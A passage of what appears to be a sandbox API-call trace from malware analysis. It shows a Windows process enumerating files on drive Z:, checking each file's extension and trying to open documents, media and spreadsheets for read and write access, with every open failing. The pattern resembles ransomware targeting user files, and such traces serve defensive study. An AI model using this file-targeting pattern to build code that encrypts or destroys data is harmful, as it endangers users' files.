[0180.953] CreateFileW (lpFileName="Z:\\lDq8f54d4hhCIri7rU.rtf" (normalized: "z:\\ldq8f54d4hhciri7ru.rtf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.955] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.955] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15208, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="gkNzsfx.odt", cAlternateFileName="")) returned 1 [0180.955] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.955] PathFindExtensionW (pszPath="Z:\\gkNzsfx.odt") returned=".odt" [0180.960] CreateFileW (lpFileName="Z:\\gkNzsfx.odt" (normalized: "z:\\gknzsfx.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.961] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.961] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbd1d05, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266c3242, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbd1d05, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xb863, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="uX9C3BTlu7W5CJLwms.ppt", cAlternateFileName="")) returned 1 [0180.962] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.962] PathFindExtensionW (pszPath="Z:\\uX9C3BTlu7W5CJLwms.ppt") returned=".ppt" [0180.967] CreateFileW (lpFileName="Z:\\uX9C3BTlu7W5CJLwms.ppt" (normalized: "z:\\ux9c3btlu7w5cjlwms.ppt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.968] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.968] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbdb947, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266cce83, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbdb947, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbe68, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="vKgP03.mp3", cAlternateFileName="")) returned 1 [0180.968] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.968] PathFindExtensionW (pszPath="Z:\\vKgP03.mp3") returned=".mp3" [0180.974] CreateFileW (lpFileName="Z:\\vKgP03.mp3" (normalized: "z:\\vkgp03.mp3"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.976] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.976] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26675040, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x17c8d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="a7jth.jpg", cAlternateFileName="")) returned 1 [0180.976] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.976] PathFindExtensionW (pszPath="Z:\\a7jth.jpg") returned=".jpg" [0180.981] CreateFileW (lpFileName="Z:\\a7jth.jpg" (normalized: "z:\\a7jth.jpg"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.983] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0180.983] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbe5588, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266d6ac3, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbe5588, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x158c1, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="zYMAYhHoRyK6PFynZFc.mkv", cAlternateFileName="")) returned 1 [0180.983] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0180.983] PathFindExtensionW (pszPath="Z:\\zYMAYhHoRyK6PFynZFc.mkv") returned=".mkv" [0180.987] CreateFileW (lpFileName="Z:\\zYMAYhHoRyK6PFynZFc.mkv" (normalized: "z:\\zymayhhoryk6pfynzfc.mkv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.988] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0180.988] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x1546a, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EGXGDc6zOuTQrpM.gif", cAlternateFileName="")) returned 1 [0180.988] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0180.988] PathFindExtensionW (pszPath="Z:\\EGXGDc6zOuTQrpM.gif") returned=".gif" [0180.992] CreateFileW (lpFileName="Z:\\EGXGDc6zOuTQrpM.gif" (normalized: "z:\\egxgdc6zoutqrpm.gif"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0180.994] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0180.994] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26546475, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf284, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2E6UGCq.doc", cAlternateFileName="")) returned 1 [0180.994] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0180.994] PathFindExtensionW (pszPath="Z:\\2E6UGCq.doc") returned=".doc" [0180.999] CreateFileW (lpFileName="Z:\\2E6UGCq.doc" (normalized: "z:\\2e6ugcq.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.000] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.000] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13179, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="nCFz76aqfOi4GGvs9d9.m4a", cAlternateFileName="")) returned 1 [0181.000] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.000] PathFindExtensionW (pszPath="Z:\\nCFz76aqfOi4GGvs9d9.m4a") returned=".m4a" [0181.005] CreateFileW (lpFileName="Z:\\nCFz76aqfOi4GGvs9d9.m4a" (normalized: "z:\\ncfz76aqfoi4ggvs9d9.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.006] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.006] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265771b7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x5140, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="C9OE6MiLKOuTz5.avi", cAlternateFileName="")) returned 1 [0181.006] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.006] PathFindExtensionW (pszPath="Z:\\C9OE6MiLKOuTz5.avi") returned=".avi" [0181.011] CreateFileW (lpFileName="Z:\\C9OE6MiLKOuTz5.avi" (normalized: "z:\\c9oe6milkoutz5.avi"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.012] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.012] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xaf7f, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="b13UpS9k3v.swf", cAlternateFileName="")) returned 1 [0181.012] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.012] PathFindExtensionW (pszPath="Z:\\b13UpS9k3v.swf") returned=".swf" [0181.016] CreateFileW (lpFileName="Z:\\b13UpS9k3v.swf" (normalized: "z:\\b13ups9k3v.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.017] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.017] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26594678, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x577b, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="MM3Rngzs9r6yCyV.csv", cAlternateFileName="")) returned 1 [0181.017] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.017] PathFindExtensionW (pszPath="Z:\\MM3Rngzs9r6yCyV.csv") returned=".csv" [0181.022] CreateFileW (lpFileName="Z:\\MM3Rngzs9r6yCyV.csv" (normalized: "z:\\mm3rngzs9r6ycyv.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.023] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.023] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbbe482, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266a5d81, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbbe482, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x15886, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="mcLK0zRep8.ots", cAlternateFileName="")) returned 1 [0181.023] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.023] PathFindExtensionW (pszPath="Z:\\mcLK0zRep8.ots") returned=".ots" [0181.027] CreateFileW (lpFileName="Z:\\mcLK0zRep8.ots" (normalized: "z:\\mclk0zrep8.ots"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.029] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.029] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266af9c2, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xab34, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="p7Ha2r1u6wluhJ.pptx", cAlternateFileName="")) returned 1 [0181.029] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.029] PathFindExtensionW (pszPath="Z:\\p7Ha2r1u6wluhJ.pptx") returned=".pptx" [0181.033] CreateFileW (lpFileName="Z:\\p7Ha2r1u6wluhJ.pptx" (normalized: "z:\\p7ha2r1u6wluhj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.034] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.034] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbb4840, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2669c141, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbb4840, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x8b6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="iJonu6wFMMd.bmp", cAlternateFileName="")) returned 1 [0181.035] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.035] PathFindExtensionW (pszPath="Z:\\iJonu6wFMMd.bmp") returned=".bmp" [0181.039] CreateFileW (lpFileName="Z:\\iJonu6wFMMd.bmp" (normalized: "z:\\ijonu6wfmmd.bmp"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.041] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.041] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xbd6e, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KeH2iEJnN7k1r.odt", cAlternateFileName="")) returned 1 [0181.041] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.041] PathFindExtensionW (pszPath="Z:\\KeH2iEJnN7k1r.odt") returned=".odt" [0181.045] CreateFileW (lpFileName="Z:\\KeH2iEJnN7k1r.odt" (normalized: "z:\\keh2iejnn7k1r.odt"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.047] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.047] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x140ce, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="9lpH4LUvBOFfSshu6h.csv", cAlternateFileName="")) returned 1 [0181.047] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.047] PathFindExtensionW (pszPath="Z:\\9lpH4LUvBOFfSshu6h.csv") returned=".csv" [0181.052] CreateFileW (lpFileName="Z:\\9lpH4LUvBOFfSshu6h.csv" (normalized: "z:\\9lph4luvboffsshu6h.csv"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.053] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.053] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb4916f, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x265500b5, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb4916f, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x13a59, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="2XXFjQNQ26X8Wc.swf", cAlternateFileName="")) returned 1 [0181.053] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x30) returned 0x2a42698 [0181.053] PathFindExtensionW (pszPath="Z:\\2XXFjQNQ26X8Wc.swf") returned=".swf" [0181.060] CreateFileW (lpFileName="Z:\\2XXFjQNQ26X8Wc.swf" (normalized: "z:\\2xxfjqnq26x8wc.swf"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.061] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a42698 | out: hHeap=0x2c0000) returned 1 [0181.061] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb79eb7, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2658aa37, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb79eb7, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd32d, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="KLswtt0JPiPQkCC6R3Lm.m4a", cAlternateFileName="")) returned 1 [0181.061] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x40) returned 0x2a05a20 [0181.061] PathFindExtensionW (pszPath="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a") returned=".m4a" [0181.067] CreateFileW (lpFileName="Z:\\KLswtt0JPiPQkCC6R3Lm.m4a" (normalized: "z:\\klswtt0jpipqkcc6r3lm.m4a"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.068] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2a05a20 | out: hHeap=0x2c0000) returned 1 [0181.068] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafba0fbd, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x2667ec80, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafba0fbd, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x9304, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="bVYQpQ1.mp4", cAlternateFileName="")) returned 1 [0181.068] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.068] PathFindExtensionW (pszPath="Z:\\bVYQpQ1.mp4") returned=".mp4" [0181.072] CreateFileW (lpFileName="Z:\\bVYQpQ1.mp4" (normalized: "z:\\bvyqpq1.mp4"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.074] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.074] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafbc80c4, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x266b9602, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafbc80c4, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xd722, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="pQaKrG.pptx", cAlternateFileName="")) returned 1 [0181.074] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.074] PathFindExtensionW (pszPath="Z:\\pQaKrG.pptx") returned=".pptx" [0181.081] CreateFileW (lpFileName="Z:\\pQaKrG.pptx" (normalized: "z:\\pqakrg.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.083] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.083] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb5c9f2, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26563936, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb5c9f2, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0xf4a2, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="AzVWpbVP.doc", cAlternateFileName="")) returned 1 [0181.083] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.083] PathFindExtensionW (pszPath="Z:\\AzVWpbVP.doc") returned=".doc" [0181.087] CreateFileW (lpFileName="Z:\\AzVWpbVP.doc" (normalized: "z:\\azvwpbvp.doc"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.089] HeapFree (in: hHeap=0x2c0000, dwFlags=0x0, lpMem=0x2ad7ef0 | out: hHeap=0x2c0000) returned 1 [0181.089] FindNextFileW (in: hFindFile=0x2a05da8, lpFindFileData=0x2f9fba4 | out: lpFindFileData=0x2f9fba4*(dwFileAttributes=0x80, ftCreationTime.dwLowDateTime=0xafb66634, ftCreationTime.dwHighDateTime=0x1d8a8a4, ftLastAccessTime.dwLowDateTime=0x26580df7, ftLastAccessTime.dwHighDateTime=0x1d8a8a5, ftLastWriteTime.dwLowDateTime=0xafb66634, ftLastWriteTime.dwHighDateTime=0x1d8a8a4, nFileSizeHigh=0x0, nFileSizeLow=0x11b85, dwReserved0=0xa0000003, dwReserved1=0x0, cFileName="EmJj9nJ.pptx", cAlternateFileName="")) returned 1 [0181.089] RtlAllocateHeap (HeapHandle=0x2c0000, Flags=0x0, Size=0x20) returned 0x2ad7ef0 [0181.089] PathFindExtensionW (pszPath="Z:\\EmJj9nJ.pptx") returned=".pptx" [0181.093] CreateFileW (lpFileName="Z:\\EmJj9nJ.pptx" (normalized: "z:\\emjj9nj.pptx"), dwDesiredAccess=0xc0000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x80, hTemplateFile=0x0) returned 0xffffffff [0181.094] HeapFree 